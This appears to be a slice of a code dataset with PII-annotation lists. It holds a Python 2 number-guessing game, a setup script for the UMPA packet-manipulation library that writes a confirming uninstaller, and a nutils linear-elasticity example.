'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNoContent.co'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPForbidden.co'], ['URL', 'self.se'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNoContent.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNotFound.co'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNotFound.co'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNotFound.co'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNotFound.co'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'self.se'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNoContent.co'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNoContent.co'], ['URL', 'self.se'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNoContent.co'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPForbidden.co'], ['URL', 'base.Is'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.co'], ['URL', 'glance.context.Re'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.se'], ['URL', 'images.Im'], ['URL', 'self.FI'], ['URL', 'self.FI'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.re'], ['URL', 'req.co'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'self.serializer.me'], ['URL', 'self.FI'], ['URL', 'headers.it'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.re'], ['URL', 'req.co'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'self.serializer.me'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'headers.it'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.serializer.me'], ['URL', 'self.FI'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'self.serializer.sh'], ['URL', 'self.FI'], ['URL', 'headers.it'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'response.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'response.re'], ['URL', 'self.serializer.sh'], ['URL', 'self.FI'], ['URL', 'self.as'], ['URL', 'response.re'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.re'], ['URL', 'req.co'], ['URL', 'self.co'], ['URL', 'self.FI'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.as'], ['URL', 'self.stubs.Se'], ['URL', 'self.serializer.no'], ['URL', 'glance.api.common.im'], ['URL', 'self.serializer.no'], ['URL', 'self.as'], ['URL', 'image.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.re'], ['URL', 'req.co'], ['URL', 'self.co'], ['URL', 'self.FI'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.as'], ['URL', 'self.stubs.Se'], ['URL', 'self.serializer.no'], ['URL', 'glance.api.common.im'], ['URL', 'self.serializer.no'], ['URL', 'self.as'], ['URL', 'copy.de'], ['URL', 'glance.api.v1.images.red'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'copy.de'], ['URL', 'glance.api.v1.images.red'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'base.Is'], ['URL', 'self.as'], ['URL', 'glance.api.v1.filters.va'], ['URL', 'self.as'], ['URL', 'glance.api.v1.filters.va'], ['URL', 'self.as'], ['URL', 'glance.api.v1.filters.va'], ['URL', 'self.as'], ['URL', 'glance.api.v1.filters.va'], ['URL', 'self.as'], ['URL', 'glance.api.v1.filters.va'], ['URL', 'base.Is'], ['URL', 'self.ma'], ['URL', 'routes.Ma'], ['URL', 'self.se'], ['URL', 'self.ma'], ['URL', 'api.se'], ['URL', 'api.ge'], ['URL', 'models.re'], ['URL', 'self.de'], ['URL', 'models.re'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'image.bo'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'webob.exc.HTTPForbidden.co'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'webob.exc.HTTPForbidden.co'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'webob.exc.HTTPForbidden.co'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st']] |
24 | #!/usr/bin/python
# version 4
# april 2012
# this was written by saikia81 and is copyrighted under the GNU general public license 3
# it was written in notepad++, a program I recommend!
# whitespace ftw!
#import random, system and operating system possibilities.
import os, sys
import random, time #time moduele
#pickling for data2file
import cPickle as pickle
#introducing the player
def instructions():
print 'welcome to the guess my number game V4'
print "I'll think of a number and you have to guess it\n"
#making a list of all possible numbers for every dificulty
def list_numbers():
list_easy = []
list_medium = []
list_hard = []
for n in range(1,101):
list_easy.append(n)
list_medium.append(n)
list_hard.append(n)
for n in range(101,201):
list_medium.append(n)
list_hard.append(n)
for n in range(-201,0):
n += 1
list_hard.append(n)
return list_easy, list_medium, list_hard
#does the player want to change the dificulty
def change_dificulty(dificulty):
if dificulty == None:
dificulty = choose_dificulty()
return dificulty
if raw_input("do you want to change dificulty? yes/no: ") == 'yes':
dificulty = choose_dificulty()
return dificulty
else:
return dificulty
#the dificulty the player wants to choose
def choose_dificulty():
print '\nwhat dificulty do you want to play in?'
dificulty = raw_input('choose between "easy", "medium" or "hard":\n')
dificulties = 'easy', 'medium', 'hard'
#if anybody tries to be smart: help them get it right
wrong = -1
if dificulty in dificulties: wrong = 0
elif dificulty not in dificulties:
wrong += 1
for n in (1,2,3):
if n == 3:
print "\nseems like you can't handle choosing a dificulty..."
dificulty = "easy"
time.sleep(2)
print ""
elif (dificulty not in dificulties):
print 'something went wrong!!! please try again\n'
dificulty = raw_input('choose between "easy", "medium" or "hard":\n')
wrong += 1
elif dificulty in dificulties:
print "\nalright so let's get started :D\n"
break
else:
print "you're doing something wrong! I'll chooce a dificulty for you\a\a\a\a\n"
dificulty = 'easy'
print "ERROR: 008"
time.sleep(2)
else:
print '\a\a\asomething went wrong the program will shutdown.'
print "ERROR: 009"
time.sleep(2.5)
sys.exit()
return dificulty
#so here a random number will be choosen depending of the dificulty
def random_number(dificulty, list_easy, list_medium, list_hard):
if dificulty == 'easy':
NUMBER = random.randrange(100) + 1
print "you have choosen the dificulty easy."
number_range = '1 and 100: '
numbers = list_easy
elif dificulty == 'medium':
NUMBER = random.randrange(200) + 1
print "you have choosen the dificulty medium."
number_range = '1 and 200: '
numbers = list_medium
elif dificulty =='hard':
NUMBER = random.randrange(-200,201)
print "you have choosen the dificulty hard."
number_range = '-200 and 200: '
numbers = list_hard
else:
print "dificulty malfunction"
print "ERROR: 003"
time.sleep(2.5)
exit()
return NUMBER, number_range, numbers
# if the guess != "the (predefined) number": loop.
def game(dificulty, NUMBER, number_range, numbers):
time.sleep(2.5)
os.system('cls')
guesses=0
guess='nothing'
while guess != NUMBER:
if guess == 'nothing':
print 'guess a number between', number_range
try:
guess = input()
except:
print "\nsomething went wrong\nyou're getting another try\n\n"
continue
guesses += 1
elif guess == 'cheater':
guess = NUMBER
elif guess not in numbers:
print "\nthe guess you made isn't in the range of valid numbers.\nAre you sure you want to make this guess?"
answ = raw_input("'yes'/'no' \n")
if answ == 'yes':
print "it's your funeral"
print '\nnguess a number between', number_range
guesses += 1
elif answ == 'no':
print "good choice"
print '\nguess a number between', number_range
try:
guess = input()
except:
print "something went wrong\nyou're getting another try\n"
continue
else:
print "that isn't a valid option"
print "let's continue\n"
#if the number is higher than the guess
elif guess < NUMBER:
print 'higher...'
print '\nguess a number between', number_range
try:
guess = input()
except:
print "something went wrong\nyou're getting another try\n"
continue
guesses += 1
continue
#if the number is 'lower...'
elif guess > NUMBER:
print 'lower...'
print '\nguess a number between', number_range
try:
guess = input()
except:
print "something went wrong\n you'll get another try"
continue
guesses -= 1
guesses += 1
#this is actually an error that will never occur... but better safe than sorry.
else:
print '\a\a\asorry, something went wrong. The game will now end itself.'
sys.exit()
print
print 'you did it the NUMBER was: ', NUMBER,
print 'it cost you ', guesses, 'guesses to get it right', 'on dificulty', dificulty
print
return guesses
##Here I will use the 'os' module to keep a highscore system
#in the default appdata of the users profile.
#everything here is to see if everything is alright in it's place.
def highscore(dificulty,guesses):
FOLDER_LOCALAPPDATA = os.environ['LOCALAPPDATA']
FOLDER_NUMBER_GAME = FOLDER_LOCALAPPDATA + '\\Number_game'
#deciding if a new highscore file and/or dir is needed
if os.access(FOLDER_NUMBER_GAME, 0) == False: #dir
try:
os.mkdir(FOLDER_NUMBER_GAME)
except:
os.system('cls')
print 'creating folder: ERROR\nError code: 002'
os.system('pause')
sys.exit()
try:
HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+"\\highscores.dat", "w+")
easy_highscores={}
medium_highscores={}
hard_highscores={}
all_highscores = [easy_highscores,medium_highscores,hard_highscores]
pickle.dump(all_highscores,HIGHSCORES_DAT)
HIGHSCORES_DAT.close()
HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+"\\highscores.dat", "r+")
unpickled_file = pickle.load(HIGHSCORES_DAT)
except:
os.system('cls')
print 'loading file: ERROR\nError code: 001'
os.system('pause')
sys.exit()
else:
HIGHSCORES_DAT.close()
#done with file and folder creation
#
#showing highscores
HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+"\\highscores.dat", "r")
try:
unpickled_file = pickle.load(HIGHSCORES_DAT)
except:
print "couldn't locate or unpickle file"
print "ERROR: 005"
print "\n if this was your first run of the game: this is common"
print "if not, please send a message at dummy@email.com, thank you"
time.sleep(1)
print "everything went worse then expected. shutting down"
time.sleep(2.5)
sys.exit()
else:
HIGHSCORES_DAT.close()
if dificulty == "easy": l=0
if dificulty == "medium": l=1
if dificulty == "hard": l=2
highscores = unpickled_file[l]
#creating your highscore...
your_name = raw_input('what is your name?: ')
try:
if highscores[your_name]>guesses:
os.system('cls')
print "congratulations, new highscore!!"
if raw_input('do you want to replace your score yes/no: ') =="yes": highscores[your_name]=guesses
except:
print "new user"
highscores[your_name]=guesses
list_keys= highscores.keys()
list_values= highscores.values()
list_values.sort()
time.sleep(4)
os.system('cls')
#deeply annoying part
#highscore display
print" ---HIGHSCORE---"
print "highscores in", dificulty,"dificulty"
print"\nname attempts"
print"----------------------------------------"
i=0
#for values in sorted values list
for n in list_values:
#reset found to find next highscore
found = False
#set p to 0: to try different keys
p=0
#while the matching key and value not found keep looking
while found != True:
#m = the next key in list
m=list_keys[p]
if highscores[m] == n: found=True
p+=1
b=len(m)
b=21-b
print m,' '*b,highscores[m]
HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+"\\highscores.dat", "r")
unpickled_file = pickle.load(HIGHSCORES_DAT)
HIGHSCORES_DAT.close()
if l==0: unpickled_file[0]=highscores
if l==1: unpickled_file[1]=highscores
if l==2: unpickled_file[2]=highscores
HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+"\\highscores.dat", "w")
pickle.dump(unpickled_file,HIGHSCORES_DAT)
HIGHSCORES_DAT.close()
def end():
time.sleep(1)
print('''
The number Game V4
Copyright (C) 2012 Saikia81
''')
time.sleep(5)
os.system('cls')
print("""
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
""")
time.sleep(7)
try:
if pygame.mixer.get_busy()>0:
try:
pygame.mixer.music.fadeout(3000)
except:
print "ERROR: 012"
except:
pass
time.sleep(3)
os.system('pause')
sys.exit()
def main():
#initializing
ask_music = raw_input('music "on"?: ')
if (ask_music == 'on') or (ask_music == 'yes'):
try:
import pygame.mixer
pygame.mixer.init()
pygame.mixer.music.load("song.mp3")
pygame.mixer.music.play(-1)
except:
print "pygame not working!\nError: 013"
os.system('cls')
list_easy, list_medium, list_hard = list_numbers()
dificulty = None
instructions()
while 1:
dificulty=change_dificulty(dificulty)
NUMBER, number_range, numbers = random_number(dificulty, list_easy, list_medium, list_hard)
guesses = game(dificulty, NUMBER, number_range, numbers)
highscore(dificulty,guesses)
ask_again = raw_input('\ndo you want to play again? yes/no: ')
os.system('cls')
if ask_again == 'no': end()
#start
main()
| 11,829 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', 'april 2012'], ['LOCATION', 'list_easy'], ['LOCATION', 'game(dificulty'], ['PERSON', 'list_values= highscores.values'], ['PERSON', 'list_values.sort'], ['DATE_TIME', '2012'], ['LOCATION', 'list_easy'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'os.sy'], ['URL', 'os.ac'], ['URL', 'os.mk'], ['URL', 'os.sy'], ['URL', 'os.sy'], ['URL', 'DAT.cl'], ['URL', 'os.sy'], ['URL', 'os.sy'], ['URL', 'DAT.cl'], ['URL', 'email.com'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'DAT.cl'], ['URL', 'os.sy'], ['URL', 'highscores.ke'], ['URL', 'highscores.va'], ['URL', 'values.so'], ['URL', 'time.sl'], ['URL', 'os.sy'], ['URL', 'DAT.cl'], ['URL', 'DAT.cl'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'os.sy'], ['URL', 'time.sl'], ['URL', 'pygame.mixer.ge'], ['URL', 'pygame.mixer.mu'], ['URL', 'time.sl'], ['URL', 'os.sy'], ['URL', 'pygame.mixer.in'], ['URL', 'pygame.mixer.mu'], ['URL', 'song.mp'], ['URL', 'pygame.mixer.music.pl'], ['URL', 'os.sy'], ['URL', 'os.sy']] |
25 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2008-2009 Adriano Monteiro Marques.
#
# Author: Bartosz SKOWRON <getxsick at gmail dot com>
#
# This library is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation; either version 2.1 of the License, or
# (at your option) any later version.
#
# This library is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
# License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this library; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import glob
import os
import os.path
from stat import ST_MODE
from distutils.core import setup
from distutils.command.install import install
UMPA_VERSION = '0.2'
SHARE_DIR = os.path.join('share', 'umpa')
DOCS_DIR = os.path.join('share', 'doc', 'umpa')
TESTS_DIR = [
os.path.join('tests'),
os.path.join('tests', 'system'),
os.path.join('tests', 'system', 'test_snd'),
os.path.join('tests', 'system', 'test_sndrcv'),
os.path.join('tests', 'a_unit'),
os.path.join('tests', 'a_unit', 'test_extensions'),
os.path.join('tests', 'a_unit', 'test_protocols'),
os.path.join('tests', 'a_unit', 'test_utils'),
os.path.join('tests', 'a_unit', 'test_sniffing'),
os.path.join('tests', 'a_unit', 'test_sniffing', 'test_libpcap'),
]
class umpa_install(install):
def run(self):
install.run(self)
self.create_uninstaller()
def create_uninstaller(self):
uninstaller_filename = os.path.join(
self.install_data, SHARE_DIR, 'uninstall_umpa')
uninstaller = []
uninstaller.append(
"#!/usr/bin/env python\n"
"import os, sys, shutil\n"
"\n"
"print\n"
"print '%(line)s Uninstall UMPA %(version)s %(line)s'\n"
"print\n"
"\n"
"answer = raw_input('Are you sure that you want to '\n"
" 'completly uninstall UMPA %(version)s? (yes/no) ')\n"
"\n"
"if answer.lower() not in ['yes', 'y']:\n"
" sys.exit(0)\n"
"\n"
"print\n"
"print '%(line)s Uninstalling UMPA %(version)s... %(line)s'\n"
"print\n" % {'version': UMPA_VERSION, 'line': '-' * 10})
for output in self.get_outputs():
uninstaller.append(
'print "Removing %(output)s..."\n'
'if os.path.exists("%(output)s"):\n'
' os.remove("%(output)s")\n' % {'output': output})
uninstaller.append(
"print 'Removing uninstaller itself...'\n"
"os.remove('%s')\n" % uninstaller_filename)
uninstaller.append('print "Removing empty directories..."\n')
for dir in (
os.path.join(self.install_data, SHARE_DIR),
os.path.join(self.install_data, DOCS_DIR),
os.path.join(self.install_lib, 'umpa'),
):
uninstaller.append(
'if os.path.exists("%(dir)s"):\n'
' shutil.rmtree("%(dir)s")\n' % {'dir' : dir})
uninstaller_file = open(uninstaller_filename, 'w')
uninstaller_file.writelines(uninstaller)
uninstaller_file.close()
# Set exec bit for uninstaller
mode = ((os.stat(uninstaller_filename)[ST_MODE]) | 0555) & 07777
os.chmod(uninstaller_filename, mode)
cmdclasses = {
'install' : umpa_install,
}
test_files = []
for dir in TESTS_DIR:
test_files = test_files + [ (os.path.join(SHARE_DIR, dir),
glob.glob(os.path.join(dir,'*.py')))]
data_files = [ (os.path.join(SHARE_DIR,'examples'),
glob.glob(os.path.join('examples','*'))),
(os.path.join(DOCS_DIR,'API'),
glob.glob(os.path.join('docs','API','*'))),
(os.path.join(DOCS_DIR,'tutorials','_sources'),
glob.glob(os.path.join('docs','tutorials','_sources','*'))),
(os.path.join(DOCS_DIR,'tutorials','_static'),
glob.glob(os.path.join('docs','tutorials','_static','*'))),
(os.path.join(DOCS_DIR,'tutorials'),
glob.glob(os.path.join('docs','tutorials','*.*'))),
(SHARE_DIR, ('run_tests.sh', 'run_tests.bat')),
(DOCS_DIR,
('README', 'COPYING', 'AUTHORS', 'TODO', 'CHANGES',
'INSTALL')),
(os.path.join(SHARE_DIR, 'tests'),
(os.path.join('tests','README'),
os.path.join('tests','IMPORTANT'))),
] + test_files
setup( name = "UMPA",
version = UMPA_VERSION,
description = "Umit's Manipulations of Packets Art",
author = "Bartosz SKOWRON",
author_email = dummy@email.com",
url = "http://www.umpa.umitproject.org",
license = "GNU LGPLv2",
platforms = ["Platform Independent"],
packages = [ "umit",
"umit.umpa",
"umit.umpa.protocols",
"umit.umpa.sniffing",
"umit.umpa.sniffing.libpcap",
"umit.umpa.extensions",
"umit.umpa.utils",
],
data_files = data_files,
cmdclass = cmdclasses,
)
| 5,889 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', 'http://www.umpa.umitproject.org'], ['DATE_TIME', '2008-2009'], ['PERSON', 'Adriano Monteiro Marques'], ['PERSON', 'Bartosz SKOWRON'], ['LOCATION', 'Boston'], ['LOCATION', 'USA'], ['PERSON', 'UMPA'], ['LOCATION', 'version)s'], ['PERSON', 'UMPA'], ['LOCATION', 'version)s'], ['PERSON', 'answer.lower'], ['LOCATION', 'version)s'], ['PERSON', 'TODO'], ['PERSON', 'Umit'], ['PERSON', 'Bartosz SKOWRON'], ['URL', 'os.pa'], ['URL', 'distutils.co'], ['URL', 'distutils.command.in'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'install.ru'], ['URL', 'self.cr'], ['URL', 'os.path.jo'], ['URL', 'self.in'], ['URL', 'self.ge'], ['URL', 'os.pa'], ['URL', 'os.re'], ['URL', 'os.re'], ['URL', 'os.path.jo'], ['URL', 'self.in'], ['URL', 'os.path.jo'], ['URL', 'self.in'], ['URL', 'os.path.jo'], ['URL', 'self.in'], ['URL', 'os.pa'], ['URL', 'file.cl'], ['URL', 'os.st'], ['URL', 'os.ch'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'tests.sh'], ['URL', 'tests.ba'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'email.com'], ['URL', 'umit.umpa.pro'], ['URL', 'umit.umpa.sn'], ['URL', 'umit.umpa.sniffing.li']] |
26 | #! /usr/bin/env python3
#
# In this script we solve the linear elasticity problem on a unit square
# domain, clamped at the left boundary, and stretched at the right boundary
# while keeping vertical displacements free.
from nutils import mesh, function, solver, export, cli, testing
def main(nelems:int, etype:str, btype:str, degree:int, poisson:float):
'''
Horizontally loaded linear elastic plate.
.. arguments::
nelems [10]
Number of elements along edge.
etype [square]
Type of elements (square/triangle/mixed).
btype [std]
Type of basis function (std/spline), with availability depending on the
configured element type.
degree [1]
Polynomial degree.
poisson [.25]
Poisson's ratio, nonnegative and strictly smaller than 1/2.
'''
domain, geom = mesh.unitsquare(nelems, etype)
ns = function.Namespace()
ns.x = geom
ns.basis = domain.basis(btype, degree=degree).vector(2)
ns.u_i = 'basis_ni ?lhs_n'
ns.X_i = 'x_i + u_i'
ns.lmbda = 2 * poisson
ns.mu = 1 - 2 * poisson
ns.strain_ij = '(d(u_i, x_j) + d(u_j, x_i)) / 2'
ns.stress_ij = 'lmbda strain_kk δ_ij + 2 mu strain_ij'
sqr = domain.boundary['left'].integral('u_k u_k J(x)' @ ns, degree=degree*2)
sqr += domain.boundary['right'].integral('(u_0 - .5)^2 J(x)' @ ns, degree=degree*2)
cons = solver.optimize('lhs', sqr, droptol=1e-15)
res = domain.integral('d(basis_ni, x_j) stress_ij J(x)' @ ns, degree=degree*2)
lhs = solver.solve_linear('lhs', res, constrain=cons)
bezier = domain.sample('bezier', 5)
X, sxy = bezier.eval(['X', 'stress_01'] @ ns, lhs=lhs)
export.triplot('shear.png', X, sxy, tri=bezier.tri, hull=bezier.hull)
return cons, lhs
# If the script is executed (as opposed to imported), :func:`nutils.cli.run`
# calls the main function with arguments provided from the command line. For
# example, to keep with the default arguments simply run :sh:`python3
# elasticity.py`. To select mixed elements and quadratic basis functions add
# :sh:`python3 elasticity.py etype=mixed degree=2`.
if __name__ == '__main__':
cli.run(main)
